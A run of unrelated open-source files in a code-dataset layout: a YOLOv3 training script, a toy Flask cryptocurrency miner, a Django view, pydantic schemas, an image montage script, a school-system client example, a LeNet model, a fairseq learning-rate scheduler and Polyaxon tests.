anchors = get_anchors(anchors_path)
input_shape = (416,416) # multiple of 32, hw
is_tiny_version = len(anchors)==6 # default setting
if is_tiny_version:
model = create_tiny_model(input_shape, anchors, num_classes,
freeze_body=2, weights_path='model_data/tiny_yolo_weights.h5')
else:
model = create_model(input_shape, anchors, num_classes,
freeze_body=2, weights_path='model_data/yolo_weights.h5') # make sure you know what you freeze
#该回调函数将日志信息写入TensorBorad,使得你可以动态的观察训练和测试指标的图像以及不同层的激活值直方图。
logging = TensorBoard(log_dir=log_dir)
#该回调函数将在每个epoch后保存模型到filepath
checkpoint = ModelCheckpoint(log_dir + 'ep{epoch:03d}-loss{loss:.3f}-val_loss{val_loss:.3f}.h5',
monitor='val_loss', save_weights_only=True, save_best_only=True, period=3)
#当评价指标不在提升时,减少学习率
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=3, verbose=1)
#当监测值不再改善时,该回调函数将中止训练
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=10, verbose=1)
val_split = 0.1
with open(annotation_path) as f:
lines = f.readlines()
np.random.seed(10101)
np.random.shuffle(lines)#打乱排序
np.random.seed(None)
num_val = int(len(lines)*val_split)
num_train = len(lines) - num_val#拿出0.1做dev集
# Train with frozen layers first, to get a stable loss.
# Adjust num epochs to your dataset. This step is enough to obtain a not bad model.
if True:
model.compile(optimizer=Adam(lr=1e-3), loss={
# use custom yolo_loss Lambda layer.
'yolo_loss': lambda y_true, y_pred: y_pred})
batch_size = 32
print('Train on {} samples, val on {} samples, with batch size {}.'.format(num_train, num_val, batch_size))
model.fit_generator(data_generator_wrapper(lines[:num_train], batch_size, input_shape, anchors, num_classes),
steps_per_epoch=max(1, num_train//batch_size),
validation_data=data_generator_wrapper(lines[num_train:], batch_size, input_shape, anchors, num_classes),
validation_steps=max(1, num_val//batch_size),
epochs=50,
initial_epoch=0,
callbacks=[logging, checkpoint])#开始训练
model.save_weights(log_dir + 'trained_weights_stage_1.h5')
# Unfreeze and continue training, to fine-tune.
# Train longer if the result is not good.
if True:
for i in range(len(model.layers)):
model.layers[i].trainable = True#指定每一个层都是可以训练的,解冻每一层
model.compile(optimizer=Adam(lr=1e-4), loss={'yolo_loss': lambda y_true, y_pred: y_pred}) # recompile to apply the change
print('Unfreeze all of the layers.')
batch_size = 32 # note that more GPU memory is required after unfreezing the body
print('Train on {} samples, val on {} samples, with batch size {}.'.format(num_train, num_val, batch_size))
model.fit_generator(data_generator_wrapper(lines[:num_train], batch_size, input_shape, anchors, num_classes),
steps_per_epoch=max(1, num_train//batch_size),#一个epoch分成多少个batch_size
validation_data=data_generator_wrapper(lines[num_train:], batch_size, input_shape, anchors, num_classes),
validation_steps=max(1, num_val//batch_size),
epochs=100,
initial_epoch=50,
callbacks=[logging, checkpoint, reduce_lr, early_stopping])
model.save_weights(log_dir + 'trained_weights_final.h5')
# Further training if needed.
def get_classes(classes_path):
'''loads the classes'''
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def get_anchors(anchors_path):
'''loads the anchors from a file'''
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def create_model(input_shape, anchors, num_classes, load_pretrained=True, freeze_body=2,
weights_path='model_data/yolo_weights.h5'):
'''create the training model'''
K.clear_session() # get a new session
image_input = Input(shape=(None, None, 3))
h, w = input_shape
num_anchors = len(anchors)
y_true = [Input(shape=(h//{0:32, 1:16, 2:8}[l], w//{0:32, 1:16, 2:8}[l], \
num_anchors//3, num_classes+5)) for l in range(3)]#三个尺度
#[(13, 13, 3, 6), (26, 26, 3, 6), (52, 52, 3, 6)]三种大小,
#13,26,52是grid,3是每个尺度的anchor个数,6是只有一类时的向量长度(框的4个坐标信息,objectness score一位,类别1位)
model_body = yolo_body(image_input, num_anchors//3, num_classes)
print('Create YOLOv3 model with {} anchors and {} classes.'.format(num_anchors, num_classes))
if load_pretrained:#加载预训练值
model_body.load_weights(weights_path, by_name=True, skip_mismatch=True)
print('Load weights {}.'.format(weights_path))
if freeze_body in [1, 2]:
# Freeze darknet53 body or freeze all but 3 output layers.
num = (185, len(model_body.layers)-3)[freeze_body-1]#冻结185层或除了最后三层的所有前层
for i in range(num): model_body.layers[i].trainable = False
print('Freeze the first {} layers of total {} layers.'.format(num, len(model_body.layers)))
model_loss = Lambda(yolo_loss, output_shape=(1,), name='yolo_loss',
arguments={'anchors': anchors, 'num_classes': num_classes, 'ignore_thresh': 0.5})(
[*model_body.output, *y_true])
#ignore_thresh:IOU阈值
#model_body.output = [y1,y2,y3]即三个尺度的预测结果,每个y都是m*grid*grid*num_anchors*(num_classes+5)
#m = batch_size
model = Model([model_body.input, *y_true], model_loss)
#data_generator输出一个batch的数据和label,将数据先输入yolo_body(即model_body),通过网络后和y_true计算loss
return model
def create_tiny_model(input_shape, anchors, num_classes, load_pretrained=True, freeze_body=2,
weights_path='model_data/tiny_yolo_weights.h5'):
'''create the training model, for Tiny YOLOv3'''
K.clear_session() # get a new session
image_input = Input(shape=(None, None, 3))
h, w = input_shape
num_anchors = len(anchors)
y_true = [Input(shape=(h//{0:32, 1:16}[l], w//{0:32, 1:16}[l], \
num_anchors//2, num_classes+5)) for l in range(2)]
model_body = tiny_yolo_body(image_input, num_anchors//2, num_classes)
print('Create Tiny YOLOv3 model with {} anchors and {} classes.'.format(num_anchors, num_classes))
if load_pretrained:
model_body.load_weights(weights_path, by_name=True, skip_mismatch=True)
print('Load weights {}.'.format(weights_path))
if freeze_body in [1, 2]:
# Freeze the darknet body or freeze all but 2 output layers.
num = (20, len(model_body.layers)-2)[freeze_body-1]
for i in range(num): model_body.layers[i].trainable = False
print('Freeze the first {} layers of total {} layers.'.format(num, len(model_body.layers)))
model_loss = Lambda(yolo_loss, output_shape=(1,), name='yolo_loss',
arguments={'anchors': anchors, 'num_classes': num_classes, 'ignore_thresh': 0.7})(
[*model_body.output, *y_true])
model = Model([model_body.input, *y_true], model_loss)
return model
#按照batchsize大小读取数据,并打乱顺序送入到get_random_data函数,将得到的图像和标注信息转换为numpy格式,将得到的标注信息送入到preprocess_true_boxes行处理。
#返回的[image_data, *y_true]是model的输入,按一个batch输入,np.zeros(batch_size)是结果loss
def data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes):
'''data generator for fit_generator'''
n = len(annotation_lines)
i = 0
while True:#这里要写成死循环
image_data = []
box_data = []
for b in range(batch_size):
if i==0:
np.random.shuffle(annotation_lines)#图片乱序
image, box = get_random_data(annotation_lines[i], input_shape, random=True)#对每张图片进行数据增强,并分开图片地址和标签值
image_data.append(image)
box_data.append(box)
i = (i+1) % n#所有图片都输出出去时再次打乱顺序
image_data = np.array(image_data)#将图片转换成矩阵
box_data = np.array(box_data)#BBOX数据转换成矩阵
#preprocess_true_boxes:将boxs信息及与他们匹配的anchors,置信度信息,类别信息保存到y_true中,即label标签的制作。
y_true = preprocess_true_boxes(box_data, input_shape, anchors, num_classes)#将真实坐标转化为yolo需要输入的坐标
yield [image_data, *y_true], np.zeros(batch_size)
#获取读取数据的长度并判断长度是否为0,调用data_generator函数。
def data_generator_wrapper(annotation_lines, batch_size, input_shape, anchors, num_classes):
n = len(annotation_lines)
if n==0 or batch_size<=0: return None
return data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes)
if __name__ == '__main__':
_main()
| 45.912621
| 129
| 0.692641
|
9278516b50f4026a0be7509f7d8afa6699f92ca7
| 8,919
|
py
|
Python
|
src/miner/miner.py
|
nullart/oicoin
|
26f997cf15239ffa03011b387fc45ca6a8a199f4
|
[
"MIT"
] | null | null | null |
src/miner/miner.py
|
nullart/oicoin
|
26f997cf15239ffa03011b387fc45ca6a8a199f4
|
[
"MIT"
] | null | null | null |
src/miner/miner.py
|
nullart/oicoin
|
26f997cf15239ffa03011b387fc45ca6a8a199f4
|
[
"MIT"
] | null | null | null |
import time
import hashlib as hasher
import json
import requests
import base64
from flask import Flask
from flask import request
from multiprocessing import Process, Pipe
import ecdsa
from miner_config import MINER_ADDRESS, MINER_NODE_URL, PEER_NODES
node = Flask(__name__)
class Block:
def __init__(self, index, timestamp, data, previous_hash):
"""Return a new Block object. Each block is "chained" to its previous
by calling its unique hash.
Args:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
Attrib:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
hash(str): Current block unique hash.
"""
self.index = index
self.timestamp = timestamp
self.data = data
self.previous_hash = previous_hash
self.hash = self.hash_block()
def hash_block(self):
# Creates the unique hash for the block. It uses sha256.
sha = hasher.sha256()
sha.update((str(self.index) + str(self.timestamp) + str(self.data) + str(self.previous_hash)).encode('utf-8'))
return sha.hexdigest()
def create_genesis_block():
#To create each block, it needs the hash of the previous one. First block has no previous, so it must be created manually (with index zero and arbitrary previous hash)
return Block(0, time.time(), {"proof-of-work": 9, "transactions": None}, "0")
BLOCKCHAIN = []
BLOCKCHAIN.append(create_genesis_block())
NODE_PENDING_TRANSACTIONS = []
def proof_of_work(last_proof,blockchain):
# Create a variable that we will use to find our next proof of work
incrementor = last_proof + 1
# Get start time
start_time = time.time()
# Keep incrementing the incrementor until it's equal to a number divisible by 9
# and the proof of work of the previous block in the chain
while not (incrementor % 7919 == 0 and incrementor % last_proof == 0):
incrementor += 1
start_time = time.time()
# Check if any node found the solution every 60 seconds
if (int((time.time() - start_time) % 60 ) == 0):
# If any other node got the proof, stop searching
new_blockchain = consensus(blockchain)
if new_blockchain != False:
#(False:another node got proof first, new blockchain)
return (False,new_blockchain)
# Once that number is found, we can return it as a proof of our work
return (incrementor,blockchain)
def mine(a, blockchain, node_pending_transactions):
BLOCKCHAIN = blockchain
NODE_PENDING_TRANSACTIONS = node_pending_transactions
while True:
# Get the last proof of work
last_block = BLOCKCHAIN[len(BLOCKCHAIN) - 1]
last_proof = last_block.data['proof-of-work']
# Find the proof of work for the current block being mined
# Note: The program will hang here until a new proof of work is found
proof = proof_of_work(last_proof, BLOCKCHAIN)
# If we didn't guess the proof, start mining again
if proof[0] == False:
# Update blockchain and save it to file
BLOCKCHAIN = proof[1]
a.send(BLOCKCHAIN)
continue
else:
# Once we find a valid proof of work, we know we can mine a block so
# we reward the miner by adding a transaction
#First we load all pending transactions sent to the node server
NODE_PENDING_TRANSACTIONS = requests.get(MINER_NODE_URL + "/txion?update=" + MINER_ADDRESS).content
NODE_PENDING_TRANSACTIONS = json.loads(NODE_PENDING_TRANSACTIONS)
#Then we add the mining reward
NODE_PENDING_TRANSACTIONS.append({"from": "network", "to": MINER_ADDRESS, "amount": 1})
# Now we can gather the data needed to create the new block
new_block_data = {"proof-of-work": proof[0], "transactions": list(NODE_PENDING_TRANSACTIONS)}
new_block_index = last_block.index + 1
new_block_timestamp = time.time()
last_block_hash = last_block.hash
# Empty transaction list
NODE_PENDING_TRANSACTIONS = []
# Now create the new block
mined_block = Block(new_block_index, new_block_timestamp, new_block_data, last_block_hash)
BLOCKCHAIN.append(mined_block)
# Let the client know this node mined a block
print(json.dumps({"index": new_block_index, "timestamp": str(new_block_timestamp), "data": new_block_data, "hash": last_block_hash}) + "\n")
a.send(BLOCKCHAIN)
requests.get(MINER_NODE_URL + "/blocks?update=" + MINER_ADDRESS)
def find_new_chains():
# Get the blockchains of every other node
other_chains = []
for node_url in PEER_NODES:
# Get their chains using a GET request
block = requests.get(node_url + "/blocks").content
# Convert the JSON object to a Python dictionary
block = json.loads(block)
# Verify other node block is correct
validated = validate_blockchain(block)
if validated == True:
# Add it to our list
other_chains.append(block)
return other_chains
def consensus(blockchain):
# Get the blocks from other nodes
other_chains = find_new_chains()
# If our chain isn't longest, then we store the longest chain
BLOCKCHAIN = blockchain
longest_chain = BLOCKCHAIN
for chain in other_chains:
if len(longest_chain) < len(chain):
longest_chain = chain
# If the longest chain wasn't ours, then we set our chain to the longest
if longest_chain == BLOCKCHAIN:
# Keep searching for proof
return False
else:
# Give up searching proof, update chain and start over again
BLOCKCHAIN = longest_chain
return BLOCKCHAIN
def validate_blockchain(block):
return True
@node.route('/blocks', methods=['GET'])
def get_blocks():
# Load current blockchain. Only you, should update your blockchain
if request.args.get("update") == MINER_ADDRESS:
global BLOCKCHAIN
BLOCKCHAIN = b.recv()
chain_to_send = BLOCKCHAIN
else:
# Any other node trying to connect to your node will use this
chain_to_send = BLOCKCHAIN
# Convert our blocks into dictionaries so we can send them as json objects later
chain_to_send_json = []
for block in chain_to_send:
block = {
"index": str(block.index),
"timestamp": str(block.timestamp),
"data": str(block.data),
"hash": block.hash
}
chain_to_send_json.append(block)
# Send our chain to whomever requested it
chain_to_send = json.dumps(chain_to_send_json)
return chain_to_send
@node.route('/txion', methods=['GET','POST'])
def transaction():
if request.method == 'POST':
# On each new POST request, we extract the transaction data
new_txion = request.get_json()
# Then we add the transaction to our list
if validate_signature(new_txion['from'],new_txion['signature'],new_txion['message']):
NODE_PENDING_TRANSACTIONS.append(new_txion)
# Because the transaction was successfully
# submitted, we log it to our console
print("New transaction")
print("FROM: {0}".format(new_txion['from']))
print("TO: {0}".format(new_txion['to']))
print("AMOUNT: {0}\n".format(new_txion['amount']))
# Then we let the client know it worked out
return "Transaction submission successful\n"
else:
return "Transaction submission failed. Wrong signature\n"
#Send pending transactions to the mining process
elif request.method == 'GET' and request.args.get("update") == MINER_ADDRESS:
pending = json.dumps(NODE_PENDING_TRANSACTIONS)
# Empty transaction list
NODE_PENDING_TRANSACTIONS[:] = []
return pending
def validate_signature(public_key, signature, message):
public_key = (base64.b64decode(public_key)).hex()
signature = base64.b64decode(signature)
vk = ecdsa.VerifyingKey.from_string(bytes.fromhex(public_key), curve=ecdsa.SECP256k1)
try:
return(vk.verify(signature, message.encode()))
except:
return False
def welcome_msg():
print("Welcome to Ushacoin")
if __name__ == '__main__':
welcome_msg()
#Start mining
a,b=Pipe()
p1 = Process(target = mine, args=(a, BLOCKCHAIN, NODE_PENDING_TRANSACTIONS))
p1.start()
#Start server to recieve transactions
p2 = Process(target = node.run(), args=b)
p2.start()
| 39.995516
| 171
| 0.656352
|
4e42118549688739a453af9c0681d8e9ff81dbaa
| 372
|
py
|
Python
|
irrigator_pro/farms/empty_view.py
|
warnes/irrigatorpro
|
4838f8832bdbf87f394a0298adc5dabfc26e82e8
|
[
"MIT"
] | null | null | null |
irrigator_pro/farms/empty_view.py
|
warnes/irrigatorpro
|
4838f8832bdbf87f394a0298adc5dabfc26e82e8
|
[
"MIT"
] | null | null | null |
irrigator_pro/farms/empty_view.py
|
warnes/irrigatorpro
|
4838f8832bdbf87f394a0298adc5dabfc26e82e8
|
[
"MIT"
] | null | null | null |
from django.views.generic import TemplateView
from django.utils.decorators import method_decorator
from django.contrib.auth.decorators import login_required
class EmptyView(TemplateView):
template_name = 'farms/empty.html'
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(EmptyView, self).dispatch(*args, **kwargs)
| 33.818182
| 63
| 0.774194
|
e839d795869acef91e050db28bbbc710e2d82dec
| 554
|
py
|
Python
|
src/modist/app/schemas/security.py
|
modist-io/modist-api
|
827d4b1962caee9a2fde1470df30d8fd60f8f998
|
[
"0BSD"
] | 1
|
2021-01-03T00:20:07.000Z
|
2021-01-03T00:20:07.000Z
|
src/modist/app/schemas/security.py
|
modist-io/modist-api
|
827d4b1962caee9a2fde1470df30d8fd60f8f998
|
[
"0BSD"
] | null | null | null |
src/modist/app/schemas/security.py
|
modist-io/modist-api
|
827d4b1962caee9a2fde1470df30d8fd60f8f998
|
[
"0BSD"
] | null | null | null |
# -*- encoding: utf-8 -*-
# Copyright (c) 2020 Modist Team <admin@modist.io>
# ISC License <https://choosealicense.com/licenses/isc>
"""Contains schemas related to security routes and services."""
from typing import List
from pydantic import BaseModel
class JWTPayloadSchema(BaseModel):
"""Describes the JWT payload structure."""
sub: str
exp: int
iat: int
scopes: List[str]
display_name: str
class TokenSchema(BaseModel):
"""Describes the OAuth2 token payload structure."""
access_token: str
token_type: str
| 20.518519
| 63
| 0.698556
|
84ccb05f5591a5aaa47b58271afbb852d0c915ca
| 1,354
|
py
|
Python
|
montage.py
|
sergentd/neural_style_transfer
|
f8a856ec387c092e0df757566ca5d8894d118fb3
|
[
"MIT"
] | null | null | null |
montage.py
|
sergentd/neural_style_transfer
|
f8a856ec387c092e0df757566ca5d8894d118fb3
|
[
"MIT"
] | null | null | null |
montage.py
|
sergentd/neural_style_transfer
|
f8a856ec387c092e0df757566ca5d8894d118fb3
|
[
"MIT"
] | null | null | null |
# import necessary packages
from conf import config as conf
from imutils import build_montages
from imutils import paths
import numpy as np
import imutils
import argparse
import cv2
import os
# grab the reference to the list of images we want to include in the montage
origPaths = list(paths.list_images(conf.ORIG_DIR))
deepPaths = list(paths.list_images(conf.DEEP_DIR))
# grab randomly a list of files to include in the montage and initialize the
# list of images
(lines, columns) = conf.MONTAGE_TILES
idxs = np.arange(0, len(origPaths)-1)
idxs = np.random.choice(idxs, size=min(int(lines*columns/2),
len(origPaths)), replace=False)
images = []
# loop over the selected indexes and load the images from disk, then add it
# to the list of images to build
for i in idxs:
orig = origPaths[i]
deep = os.path.sep.join([conf.DEEP_DIR, os.path.basename(orig)])
images.append(cv2.imread(orig))
images.append(cv2.imread(deep))
# create the montage
montage = build_montages(images, conf.MONTAGE_SIZE, conf.MONTAGE_TILES)[0]
# check to see if we need to display the legend on the image
if conf.MONTAGE_LEGEND:
cv2.putText(montage, "press any key to continue...", (30, 30),
cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255), 2)
# show the images side by side for a clear comparison
cv2.imshow("Orig vs. Deep", montage)
cv2.waitKey(0)
| 32.238095
| 76
| 0.742245
|
83f0aa7a6c35b3d08e47fd7fe2ca8569ea725b7b
| 734
|
py
|
Python
|
examples/captcha_examples.py
|
Ziki2001/new-school-sdk
|
b606e666888e1c9813e2f1a6a64bbede3744026e
|
[
"MIT"
] | 9
|
2021-09-03T11:55:08.000Z
|
2022-01-29T04:42:01.000Z
|
examples/captcha_examples.py
|
Ziki2001/new-school-sdk
|
b606e666888e1c9813e2f1a6a64bbede3744026e
|
[
"MIT"
] | 15
|
2022-01-06T08:45:47.000Z
|
2022-03-31T13:45:07.000Z
|
examples/captcha_examples.py
|
Ziki2001/new-school-sdk
|
b606e666888e1c9813e2f1a6a64bbede3744026e
|
[
"MIT"
] | 6
|
2021-12-01T04:52:06.000Z
|
2022-01-29T04:42:04.000Z
|
# -*- coding: utf-8 -*-
'''
:file: use_verify.py
:author: -Farmer
:url: https://blog.farmer233.top
:date: 2022/01/14 21:33:06
'''
from school_sdk.client import UserClient
from school_sdk import SchoolClient
# 实例化学校
# 并根据验证码类型指定captcha_type为kap或者cap
# 使用Kaptcha(与旧版系统类似的验证码)
Gdust = SchoolClient("172.16.254.1", exist_verify=True, captcha_type="kaptcha")
# 使用captcha(滑块验证码)
Gdust = SchoolClient("172.16.254.1", exist_verify=True, captcha_type="captcha")
# 实例化用户
user:UserClient = Gdust.user_login("account", "password")
# 获取课表
course = user.get_schedule(year=2021, term=1)
print(course)
# 获取成绩, 2020-2021学年第一学期的成绩
score = user.get_score(year=2020, term=1)
print(score)
# 获取个人信息
info = user.get_info()
print(info)
| 22.242424
| 79
| 0.724796
|
19846a50ce08052183af0f414bad881e5340ce64
| 1,396
|
py
|
Python
|
code/models/LeNet.py
|
ArvindSubramaniam/Pruning-Networks-using-Neuron2Neuron-Skip-Connections
|
bbe402bbf4c5afb4ae712354e8fca5ce320501b8
|
[
"Apache-2.0"
] | 1
|
2021-11-16T03:36:51.000Z
|
2021-11-16T03:36:51.000Z
|
code/models/LeNet.py
|
ArvindSubramaniam/Pruning-Networks-using-Neuron2Neuron-Skip-Connections
|
bbe402bbf4c5afb4ae712354e8fca5ce320501b8
|
[
"Apache-2.0"
] | null | null | null |
code/models/LeNet.py
|
ArvindSubramaniam/Pruning-Networks-using-Neuron2Neuron-Skip-Connections
|
bbe402bbf4c5afb4ae712354e8fca5ce320501b8
|
[
"Apache-2.0"
] | 3
|
2020-12-29T01:52:01.000Z
|
2021-11-16T03:36:52.000Z
|
import torch
import torch.nn as nn
import torch.optim
import torch.nn.functional as F
class LeNet5(nn.Module):
def __init__(self):
super(LeNet5, self).__init__()
# input channel = 1, output channel = 6, kernel_size = 5
# input size = (32, 32), output size = (28, 28)
self.conv1 = nn.Conv2d(1, 6, 5)
# input channel = 6, output channel = 16, kernel_size = 5
# input size = (14, 14), output size = (10, 10)
self.conv2 = nn.Conv2d(6, 16, 5)
# input dim = 16*5*5, output dim = 120
self.fc1 = nn.Linear(16 * 5 * 5, 120)
# input dim = 120, output dim = 84
self.fc2 = nn.Linear(120, 84)
# input dim = 84, output dim = 10
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
# pool size = 2
# input size = (28, 28), output size = (14, 14), output channel = 6
x = F.max_pool2d(F.relu(self.conv1(x)), 2)
# pool size = 2
# input size = (10, 10), output size = (5, 5), output channel = 16
x = F.max_pool2d(F.relu(self.conv2(x)), 2)
# flatten as one dimension
x = x.view(x.size()[0], -1)
# input dim = 16*5*5, output dim = 120
x = F.relu(self.fc1(x))
# input dim = 120, output dim = 84
x = F.relu(self.fc2(x))
# input dim = 84, output dim = 10
x = self.fc3(x)
return x
| 34.04878
| 75
| 0.532951
|
84a1382812464141654e9f3ed4166db0ee5d8935
| 127
|
py
|
Python
|
examples/preprocess/showpoint.py
|
pysrc/cvauto
|
90466de8d6a56b7489ef2ad1139cdb4aafe84e9f
|
[
"MIT"
] | 5
|
2018-09-29T13:57:48.000Z
|
2022-03-10T03:04:30.000Z
|
examples/preprocess/showpoint.py
|
pysrc/cvauto
|
90466de8d6a56b7489ef2ad1139cdb4aafe84e9f
|
[
"MIT"
] | 1
|
2019-01-24T23:56:00.000Z
|
2019-02-12T07:51:16.000Z
|
examples/preprocess/showpoint.py
|
pysrc/cvauto
|
90466de8d6a56b7489ef2ad1139cdb4aafe84e9f
|
[
"MIT"
] | null | null | null |
from cvauto import position
p = position.Position()
k = position.KeyType('7.png', dx=153, dy=-77)
p.getPosition(k, debug=True)
| 25.4
| 45
| 0.724409
|
5199b09a3ecda65f2b31cda3afe1248c16ad7ac5
| 4,755
|
py
|
Python
|
fairseq/optim/lr_scheduler/reduce_lr_on_plateau.py
|
kai-xl8/fairseq
|
fd080b308e1e3361d6c498b235496080fa6599e5
|
[
"MIT"
] | 143
|
2020-12-30T21:40:00.000Z
|
2022-01-06T21:19:24.000Z
|
fairseq/optim/lr_scheduler/reduce_lr_on_plateau.py
|
kai-xl8/fairseq
|
fd080b308e1e3361d6c498b235496080fa6599e5
|
[
"MIT"
] | 5
|
2021-05-24T08:56:59.000Z
|
2021-11-19T09:21:31.000Z
|
fairseq/optim/lr_scheduler/reduce_lr_on_plateau.py
|
kai-xl8/fairseq
|
fd080b308e1e3361d6c498b235496080fa6599e5
|
[
"MIT"
] | 20
|
2021-03-27T10:30:32.000Z
|
2022-03-17T17:13:41.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch.optim.lr_scheduler
from . import register_lr_scheduler, LegacyFairseqLRScheduler
@register_lr_scheduler('reduce_lr_on_plateau')
class ReduceLROnPlateau(LegacyFairseqLRScheduler):
"""
Decay the LR by a factor every time the validation loss plateaus.
Also comes with optional warmup phase, where we linearly increase
the learning rate from some initial learning rate
(``--warmup-init-lr``) until the configured learning rate
(``--lr``). Thereafter the lr is adjusted according to original
reduce_on_plateau scheme.
During warmup::
lrs = torch.linspace(
args.warmup_init_lr, args.lr, args.warmup_updates
)
lr = lrs[update_num]
"""
def __init__(self, args, optimizer):
super().__init__(args, optimizer)
if len(args.lr) > 1:
raise ValueError(
'Cannot use a fixed learning rate schedule with reduce_lr_on_plateau.'
' Consider --lr-scheduler=fixed instead.'
)
self.lr_scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(
self.optimizer.optimizer, patience=args.lr_patience, factor=args.lr_shrink,
mode='max' if args.maximize_best_checkpoint_metric else 'min',
threshold=args.lr_threshold)
warmup_end_lr = args.lr[0]
# if no warm up, sets initial lr to be args.lr[0]
if args.warmup_init_lr < 0:
args.warmup_init_lr = 0 if args.warmup_updates > 0 else warmup_end_lr
# linearly warmup for the first args.warmup_updates
if args.warmup_updates > 0:
self.lr_step = (warmup_end_lr - args.warmup_init_lr) / args.warmup_updates
# this flag is either set from arg when no warm up, or set by
# step_update() when warmup finishes
self.warmup_end = True if args.warmup_updates <= 0 else False
# initial learning rate
# this self.lr is used only during init and/or warm up period
self.lr = args.warmup_init_lr
self.optimizer.set_lr(self.lr)
@staticmethod
def add_args(parser):
"""Add arguments to the parser for this LR scheduler."""
# fmt: off
parser.add_argument('--lr-shrink', default=0.1, type=float, metavar='LS',
help='shrink factor for annealing, lr_new = (lr * lr_shrink)')
parser.add_argument('--lr-threshold', default=1e-4, type=float, metavar='LT',
help='threshold for measuring the new optimum, '
'to only focus on significant changes')
parser.add_argument('--lr-patience', default=0, type=int,
help='number of epochs with no improvement after which '
'learning rate will be reduced')
parser.add_argument('--warmup-updates', default=0, type=int, metavar='N',
help='warmup the learning rate linearly for the first N updates')
parser.add_argument('--warmup-init-lr', default=-1, type=float, metavar='LR',
help='initial learning rate during warmup phase; default is args.lr')
# fmt: on
def state_dict(self):
"""Return the LR scheduler state dict."""
return {
'best': self.lr_scheduler.best,
'last_epoch': self.lr_scheduler.last_epoch,
}
def load_state_dict(self, state_dict):
"""Load an LR scheduler state dict."""
self.lr_scheduler.best = state_dict['best']
if 'last_epoch' in state_dict:
self.lr_scheduler.last_epoch = state_dict['last_epoch']
def step(self, epoch, val_loss=None):
"""
Update the learning rate at the end of the given epoch if warmup
finishes otherwise no update of lr on epoch boundaries
"""
if val_loss is not None and self.warmup_end is True:
self.lr_scheduler.step(val_loss)
else:
self.lr_scheduler.last_epoch = epoch
return self.optimizer.get_lr()
def step_update(self, num_updates):
"""
Update the learning rate after each update."""
# if there is warmup
if self.args.warmup_updates > 0:
if num_updates <= self.args.warmup_updates:
self.lr = self.args.warmup_init_lr + num_updates*self.lr_step
self.optimizer.set_lr(self.lr)
else:
if self.warmup_end is False:
self.warmup_end = True
# else do nothing
return self.optimizer.get_lr()
| 42.079646
| 97
| 0.625026
|
ff2a75249387f174a4c0637e45daad435e93902d
| 3,318
|
py
|
Python
|
tests/test_api/test_project.py
|
granularai/polyaxon-schemas
|
017ae74701f21f12f0b25e75379681ea5d8baa9e
|
[
"MIT"
] | null | null | null |
tests/test_api/test_project.py
|
granularai/polyaxon-schemas
|
017ae74701f21f12f0b25e75379681ea5d8baa9e
|
[
"MIT"
] | null | null | null |
tests/test_api/test_project.py
|
granularai/polyaxon-schemas
|
017ae74701f21f12f0b25e75379681ea5d8baa9e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import uuid
from unittest import TestCase
from hestia.tz_utils import local_now
from marshmallow import ValidationError
from tests.utils import assert_equal_dict
from polyaxon_schemas.api.experiment import ExperimentConfig
from polyaxon_schemas.api.group import GroupConfig
from polyaxon_schemas.api.project import ProjectConfig
class TestProjectConfigs(TestCase):
def test_validate_project_name_config(self):
config_dict = {'name': 'test sdf', 'description': '', 'is_public': True}
with self.assertRaises(ValidationError):
ProjectConfig.from_dict(config_dict)
def test_project_config(self):
config_dict = {
'name': 'test',
'description': '',
'is_public': True,
'has_code': True,
'has_tensorboard': True,
'tags': ['foo'],
'num_experiments': 0,
'num_independent_experiments': 0,
'num_experiment_groups': 0,
'num_jobs': 0,
'num_builds': 0,
'created_at': local_now().isoformat(),
'updated_at': local_now().isoformat()
}
config = ProjectConfig.from_dict(config_dict)
config_to_dict = config.to_dict()
config_to_dict.pop('id', None)
config_to_dict.pop('experiment_groups', None)
config_to_dict.pop('experiments', None)
config_to_dict.pop('has_notebook', None)
config_to_dict.pop('unique_name', None)
config_to_dict.pop('user', None)
config_to_dict.pop('owner', None)
config_to_dict.pop('uuid', None)
assert config_to_dict == config_dict
config_dict.pop('description')
config_dict.pop('updated_at')
config_dict.pop('has_code')
config_to_dict = config.to_light_dict()
config_to_dict.pop('has_notebook', None)
config_to_dict.pop('unique_name', None)
assert config_to_dict == config_dict
config_to_dict = config.to_dict(humanize_values=True)
assert config_to_dict.pop('created_at') == 'a few seconds ago'
assert config_to_dict.pop('updated_at') == 'a few seconds ago'
config_to_dict = config.to_light_dict(humanize_values=True)
assert config_to_dict.pop('created_at') == 'a few seconds ago'
def test_project_experiments_and_groups_config(self):
uuid_value = uuid.uuid4().hex
config_dict = {'name': 'test',
'description': '',
'is_public': True,
'experiment_groups': [
GroupConfig(content='content',
uuid=uuid_value,
project=uuid_value).to_dict()],
'experiments': [
ExperimentConfig(uuid=uuid_value,
project=uuid_value).to_dict()]}
config = ProjectConfig.from_dict(config_dict)
assert_equal_dict(config_dict, config.to_dict())
config_dict.pop('description')
config_dict.pop('experiment_groups')
config_dict.pop('experiments')
assert_equal_dict(config_dict, config.to_light_dict())
| 39.5
| 80
| 0.611513
|
e9ab97528d3db952aba3238b817240a777ca1c2c
| 21,010
|
py
|
Python
|
openrtdynamics2/lang/diagram_core/graph_traversion.py
|
OpenRTDynamics/PythonAPI_Experiments
|
1b7a114110089bc7721da604c5e344854ed555c3
|
[
"MIT"
] | null | null | null |
openrtdynamics2/lang/diagram_core/graph_traversion.py
|
OpenRTDynamics/PythonAPI_Experiments
|
1b7a114110089bc7721da604c5e344854ed555c3
|
[
"MIT"
] | null | null | null |
